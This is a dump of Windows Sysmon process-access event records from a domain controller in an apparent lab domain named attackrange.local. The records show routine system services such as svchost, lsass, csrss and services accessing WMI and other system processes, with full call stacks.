13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.367{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.367{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15443060C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51
791 10341000x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.320{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.304{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.304{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.289{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.007{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.007{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 